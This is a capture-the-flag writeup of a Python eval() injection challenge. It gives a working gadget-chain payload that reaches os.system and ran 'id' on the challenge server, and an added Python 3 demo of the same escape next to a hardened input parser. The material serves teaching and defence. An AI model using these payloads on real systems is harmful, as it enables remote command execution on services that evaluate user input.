Sunday, January 28, 2018

[MCSC] evilpython 50pts - Writeup[/PWN]

This is my writeup for the evilpython pwn challenge from the Myanmar Cyber Security Challenge 2018.



Hint - "Evil exists not only in hell"


Now it's time to test!
I connected with nc (the netcat client) to the server running evilpython.


First I submitted "123" to the server.
The server responded with "123".
Then I tried submitting the payload "1-2".
The server responded with "-1". Oops!
Why did it respond with "-1"?
Next I reconnected to the server with nc and, without typing anything, just pressed Enter.
I got an error.


So the backend is a Python script that passes our input, the variable age, straight to the eval function: "1-2" came back as -1 because the expression was evaluated, and an empty line produced a syntax error.

evil_age = eval(age)

A quick Google search turned up the following Python payload (it is Python 2 specific, since func_globals and indexing into dict values are gone in Python 3, and the list indices depend on the interpreter build):

"[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].__dict__.values()[144]('id')"


uid=1000(pyevil)

Bingo! We executed the "id" command on the server. Now I need to find the flag on the server.
The evil python script runs with the privileges of the pyevil user, so the flag is probably somewhere under pyevil's home folder (just a guess). Let's search the home folder for the flag.
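As an added example, not part of the original writeup or of the challenge's evil.py, the Python 3 script below reproduces the three observations from the test session ("123" echoed back, "1-2" turned into -1, and an error on empty input) against the same eval(age) pattern, rewrites the gadget chain so it no longer depends on Python 2 names or on fixed list indices, and shows the fix: parse the integer you expect instead of evaluating the input. The class name _wrap_close (a class defined in os.py, so its __init__ globals are the os namespace), the use of getcwd in place of the system/popen call an attacker would make, and the age range check are assumptions of this example, not details taken from the challenge.

```python
import os  # only for the expected value in payload_escapes_sandbox(); the payload reaches os on its own

# --- the vulnerable pattern the challenge used -------------------------------
def vulnerable_age(age: str):
    """Mirror of the server: evil_age = eval(age). Any expression runs."""
    return eval(age)  # deliberately vulnerable, as in the challenge


def empty_input_errors() -> bool:
    """The 'just press Enter' observation: eval('') raises SyntaxError."""
    try:
        vulnerable_age("")
    except SyntaxError:
        return True
    return False


# Python 3 version of the writeup's gadget chain. The original relies on Python 2
# (func_globals, indexable dict values) and on fixed list indices ([59], [12],
# [144]) that change between interpreter builds; searching by name is portable.
# Assumption: CPython 3, where os._wrap_close is a direct subclass of object and
# its __init__.__globals__ is the os module namespace. 'getcwd' stands in for
# 'system' or 'popen' so that the demo does not spawn a process.
RCE_PAYLOAD = (
    "[c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == '_wrap_close'][0].__init__.__globals__['getcwd']()"
)


def payload_escapes_sandbox() -> bool:
    """True when the payload, fed through eval(), reaches os and calls getcwd()."""
    return vulnerable_age(RCE_PAYLOAD) == os.getcwd()


# --- the fix: parse the field you expect instead of evaluating it ------------
def hardened_age(age: str) -> int:
    """int() accepts only an optionally signed run of digits (surrounding
    whitespace is tolerated); '1-2', '', and the gadget chain all raise
    ValueError instead of being executed."""
    value = int(age.strip())
    if not 0 <= value <= 150:  # assumption: a plausible age range for the form
        raise ValueError("age out of range")
    return value


def hardened_rejects(age: str) -> bool:
    """True when the hardened parser refuses the input."""
    try:
        hardened_age(age)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_age("123"), vulnerable_age("1-2"))   # 123 -1
    print(empty_input_errors(), payload_escapes_sandbox())  # True True
    print(hardened_age("123"), hardened_rejects("1-2"))    # 123 True
```

Swapping 'getcwd' for 'system' in RCE_PAYLOAD and passing 'id' gives exactly the uid line the writeup got; the hardened version never reaches eval, so no gadget chain, however it is written, gets executed.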



Now that I have found the flag path, let's read the flag.


flag : mcsc{eval_is_s0_ev!l}



Thanks for reading.

This is the second challenge I solved in MCSC2018,
and we were the first team to solve it, so we got a bonus point.

Note: I forgot to read the evil.py script!
I want to say thank you to Ko ******* who created this challenge.
